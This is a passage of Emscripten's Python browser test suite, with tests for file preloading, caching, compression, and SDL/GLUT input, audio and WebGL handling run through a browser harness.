        ("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
        ("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
        ("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
        ("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
        ("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
        (absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
        (absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
    for test in test_cases:
        (srcpath, dstpath1, dstpath2, nonexistingpath) = test
        make_main_two_files(dstpath1, dstpath2, nonexistingpath)
        print srcpath
        Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
        self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
    # Should still work with -o subdir/..
    make_main('somefile.txt') # absolute becomes relative
    try:
        os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
    except:
        # NOTE(review): bare except hides unrelated failures; presumably only
        # meant to ignore "directory already exists" (OSError) — confirm.
        pass
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
    self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
    # With FS.preloadFile
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false);
};
''')
    make_main('someotherfile.txt')
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html']).communicate()
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
def test_preload_caching(self):
    """Check --use-preload-cache: the second page load must serve the data
    package from the browser cache rather than the network.

    A JS library function counts the packages whose Module['preloadResults']
    entry has fromCache set; the C side adds that count to the file check,
    so run 1 reports 1 (file ok, nothing cached) and run 2 reports 2."""
    open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
    def make_main(path):
        # Regenerate main.cpp to read `path` from the virtual FS and add the
        # cached-package count reported by checkPreloadResults().
        print path
        open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
    # JS library: how many preloaded packages came from the cache?
    open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
    make_main('somefile.txt')
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
    # First load: nothing cached yet -> 1; second load: package cached -> 2.
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
    """--preload-file with several files in nested directories, both named
    individually and packaged via the parent directory in one go."""
    self.clear()
    # makedirs creates 'subdirr' and 'subdirr/moar' in one call.
    os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
    with open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w') as f:
        f.write('''1214141516171819''')
    with open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w') as f:
        f.write('''3.14159265358979''')
    with open(os.path.join(self.get_dir(), 'main.cpp'), 'w') as f:
        f.write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT();
return 0;
}
'''))
    # by individual files
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
    self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
    os.remove('page.html')
    # by directory, and remove the files afterwards so the data can only
    # come from the preloaded package
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
    shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
    self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_compressed_file(self):
    """--preload-file combined with --compression: the data files must be
    packed into a compressed page.data and still be readable from the
    virtual FS at runtime."""
    with open(os.path.join(self.get_dir(), 'datafile.txt'), 'w') as f:
        f.write('compress this please' + (2000*'.'))
    with open(os.path.join(self.get_dir(), 'datafile2.txt'), 'w') as f:
        f.write('moar' + (100*'!'))
    with open(os.path.join(self.get_dir(), 'main.cpp'), 'w') as f:
        f.write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[21];
FILE *f = fopen("datafile.txt", "r");
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("file says: |%s|\n", buf);
int result = !strcmp("compress this please", buf);
FILE *f2 = fopen("datafile2.txt", "r");
fread(buf, 1, 5, f2);
buf[5] = 0;
fclose(f2);
result = result && !strcmp("moar!", buf);
printf("file 2 says: |%s|\n", buf);
REPORT_RESULT();
return 0;
}
'''))
    self.build_native_lzma()
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html', '--preload-file', 'datafile.txt', '--preload-file', 'datafile2.txt',
           '--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
                                          path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
                                          'LZMA.decompress')]).communicate()
    assert os.path.exists(os.path.join(self.get_dir(), 'datafile.txt')), 'must be data file'
    assert os.path.exists(os.path.join(self.get_dir(), 'page.data.compress')), 'must be data file in compressed form'
    assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size != os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be different'
    # Hide the on-disk original so the content must come from the package.
    shutil.move(os.path.join(self.get_dir(), 'datafile.txt'), 'datafile.txt.renamedsoitcannotbefound')
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_image(self):
    # load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
    with open(path_from_root('tests', 'sdl_image.c')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w') as f:
        f.write(self.with_report_result(src))
    # Cover both --memory-init-file modes and both a root and a remapped
    # ('@') destination for the preloaded image.
    for mem in [0, 1]:
        for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
                                        ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
            Popen([
                PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
                '--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"'
            ]).communicate()
            self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
    # Same image test but with a .jpeg (not .jpg) extension, covering
    # extension-based decoder selection.
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
    with open(path_from_root('tests', 'sdl_image.c')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w') as f:
        f.write(self.with_report_result(src))
    Popen([
        PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html',
        '--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"'
    ]).communicate()
    self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_compressed(self):
for image, width in [(path_from_root('tests', 'screenshot2.png'), 300),
(path_from_root('tests', 'screenshot.jpg'), 600)]:
self.clear()
print image
basename = os.path.basename(image)
shutil.copyfile(image, os.path.join(self.get_dir(), basename))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.build_native_lzma()
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html',
'--preload-file', basename, '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="' + basename + '"',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')
]).communicate()
shutil.move(os.path.join(self.get_dir(), basename), basename + '.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?' + str(width))
def test_sdl_image_prepare(self):
    # Copy the JPEG under an extension SDL cannot recognize, so decoding
    # must go through the prepare path rather than the preload-time decoder.
    unrecognized = os.path.join(self.get_dir(), 'screenshot.not')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), unrecognized)
    self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_image_prepare_data(self):
    # As test_sdl_image_prepare, but the app also reads back the prepared
    # pixel data; file extension is deliberately unrecognizable.
    unrecognized = os.path.join(self.get_dir(), 'screenshot.not')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), unrecognized)
    self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_stb_image(self):
    # Decode via stb_image (-s STB_IMAGE=1); the extension is deliberately
    # wrong so content, not the suffix, must drive the decode.
    unrecognized = os.path.join(self.get_dir(), 'screenshot.not')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), unrecognized)
    self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_stb_image_data(self):
    # stb_image variant that also reads back the decoded pixel data.
    unrecognized = os.path.join(self.get_dir(), 'screenshot.not')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), unrecognized)
    self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_canvas(self):
    # Basic SDL canvas rendering under the legacy GL emulation layer.
    with open(path_from_root('tests', 'sdl_canvas.c')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_canvas.c'), 'w') as f:
        f.write(self.with_report_result(src))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_canvas.c'), '-o', 'page.html', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_canvas_proxy(self):
    """Render to the canvas from a worker (--proxy-to-worker) and reftest
    the pixels when the app calls window.close()."""
    def post():
        # Post-build hook: splice reftest.js into the generated page and
        # wrap window.close so the pixel comparison runs first.
        html = open('test.html').read()
        html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
doReftest();
setTimeout(windowClose, 1000);
};
</script>
</body>''' % open('reftest.js').read())
        open('test.html', 'w').write(html)
    # Data file preloaded alongside, to cover --preload-file in worker mode.
    open('data.txt', 'w').write('datum')
    self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt'], manual_reference=True, post_build=post)
def test_sdl_canvas_alpha(self):
    # Alpha-blended canvas rendering; allow one unit of per-pixel slack.
    self.btest('sdl_canvas_alpha.c', reference_slack=1, reference='sdl_canvas_alpha.png')
def test_sdl_key(self):
    """Synthesize DOM keydown/keyup events and check SDL key handling.

    pre.js polls the exported _one() at ~60Hz after startup and defines
    keydown()/keyup() helpers that dispatch KeyboardEvents on the document;
    the expected result is a product of key codes computed by sdl_key.c."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
    open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
    # _one must stay exported so the pre.js polling loop can call it.
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
    self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
    """Like test_sdl_key, but with the app proxied to a worker: key events
    must be forwarded from the main thread to the worker-side SDL."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
    def post():
        # Post-build hook: inject the key-event helpers and fire the whole
        # scripted key sequence as soon as the page loads.
        html = open('test.html').read()
        html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
        open('test.html', 'w').write(html)
    self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
    """Check SDL text input: simulateKeyEvent dispatches DOM keypress
    events carrying a charCode, which SDL must surface as text input."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
    open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
    # _one must stay exported so the pre.js polling loop can call it.
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
    """Check SDL mouse handling: simulateMouseEvent dispatches a
    mousedown+mouseup pair when button >= 0, otherwise a mousemove, with
    coordinates offset by the canvas position on the page."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
    self.run_browser('page.html', '', '/report_result?740')
def test_sdl_mouse_offsets(self):
    """Check SDL mouse coordinates when the canvas is CSS-offset on the page.

    Unlike test_sdl_mouse, simulateMouseEvent here sends raw page
    coordinates (no canvas-offset correction), and a hand-written page.html
    positions the canvas inside an absolutely-positioned container, so SDL
    must subtract the canvas offsets itself."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    # Custom shell page: canvas offset 5px from the page origin via CSS.
    open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
    open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
    # Emit JS only (-o sdl_mouse.js); the hand-written page.html loads it.
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js']).communicate()
    self.run_browser('page.html', '', '/report_result?600')
def test_glut_touchevents(self):
    # Synthesized touch events must be delivered through GLUT callbacks.
    self.btest('glut_touchevents.c', expected='1')
def test_glut_wheelevents(self):
    # Mouse wheel events must be delivered through GLUT callbacks.
    self.btest('glut_wheelevents.c', expected='1')
def test_sdl_joystick_1(self):
    # Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
    # http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
    # In this draft, buttons are plain numbers (0/1), not objects —
    # contrast with test_sdl_joystick_2 below.
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
    open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
    self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
    # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
    # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
    # In this draft, buttons are {pressed, value} objects rather than
    # numbers — the SDL glue must accept both shapes.
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
    open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
    self.run_browser('page.html', '', '/report_result?2')
def test_webgl_context_attributes(self):
    """Check that WebGL context attributes (antialias, depth, stencil)
    requested via GLUT/SDL/GLFW are reflected in the created context.

    Runs each windowing library once with the attributes requested and once
    without; the -D flags select the requested set in the shared C file."""
    # Javascript code to check the attributes support we want to test in the WebGL implementation
    # (request the attribute, create a context and check its value afterwards in the context attributes).
    # Tests will succeed when an attribute is not supported.
    open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
}
});
''')
    # Copy common code file to temporary directory
    filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
    temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
    shutil.copyfile(filepath, temp_filepath)
    # perform tests with attributes activated
    self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
    self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
    self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED'])
    # perform tests with attributes deactivated
    self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
    self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
    self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
def test_emscripten_get_now(self):
    # emscripten_get_now() must report a usable, advancing timestamp.
    self.btest('emscripten_get_now.cpp', expected='1')
def test_file_db(self):
    """Persist a preloaded file to the browser DB on the first run, then
    check later runs read the persisted secret back — even when a fresh
    --preload-file would provide different content."""
    secret = str(time.time())
    with open('moar.txt', 'w') as f:
        f.write(secret)
    self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
    shutil.copyfile('test.html', 'first.html')
    self.btest('file_db.cpp', secret)
    shutil.copyfile('test.html', 'second.html')
    with open('moar.txt', 'w') as f:
        f.write('aliantha')
    self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
    shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
    # First run stores a secret into IDBFS; second run (no -DFIRST) must
    # read it back after syncing from IndexedDB.
    secret = str(time.time())
    src = path_from_root('tests', 'fs', 'test_idbfs_sync.c')
    exports = ['-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''']
    self.btest(src, '1', force_c=True, args=['-DFIRST', '-DSECRET=\'' + secret + '\''] + exports)
    self.btest(src, '1', force_c=True, args=['-DSECRET=\'' + secret + '\''] + exports)
def test_sdl_pumpevents(self):
    # key events should be detected using SDL_PumpEvents
    with open(os.path.join(self.get_dir(), 'pre.js'), 'w') as f:
        f.write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
    self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js'])
def test_sdl_audio(self):
    """SDL audio: preloaded and embedded sound files, plus a deliberately
    corrupt "audio" file that must fail gracefully."""
    shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
    shutil.copyfile(path_from_root('tests', 'sounds', 'alarmcreatemiltaryfoot_1.wav'), os.path.join(self.get_dir(), 'sound2.wav'))
    shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'noise.ogg'))
    shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.ogg'), os.path.join(self.get_dir(), 'the_entertainer.ogg'))
    with open(os.path.join(self.get_dir(), 'bad.ogg'), 'w') as f:
        f.write('I claim to be audio, but am lying')
    with open(path_from_root('tests', 'sdl_audio.c')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_audio.c'), 'w') as f:
        f.write(self.with_report_result(src))
    # use closure to check for a possible bug with closure minifying away newer Audio() attributes
    Popen([PYTHON, EMCC, '-O2', '--closure', '1', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio.c'), '--preload-file', 'sound.ogg', '--preload-file', 'sound2.wav', '--embed-file', 'the_entertainer.ogg', '--preload-file', 'noise.ogg', '--preload-file', 'bad.ogg', '-o', 'page.html', '-s', 'EXPORTED_FUNCTIONS=["_main", "_play", "_play2"]']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_mix_channels(self):
    # Mixing the same sample on several SDL_mixer channels at once.
    shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
    with open(path_from_root('tests', 'sdl_audio_mix_channels.c')) as f:
        src = f.read()
    with open(os.path.join(self.get_dir(), 'sdl_audio_mix_channels.c'), 'w') as f:
        f.write(self.with_report_result(src))
    Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_mix_channels.c'), '--preload-file', 'sound.ogg', '-o', 'page.html']).communicate()
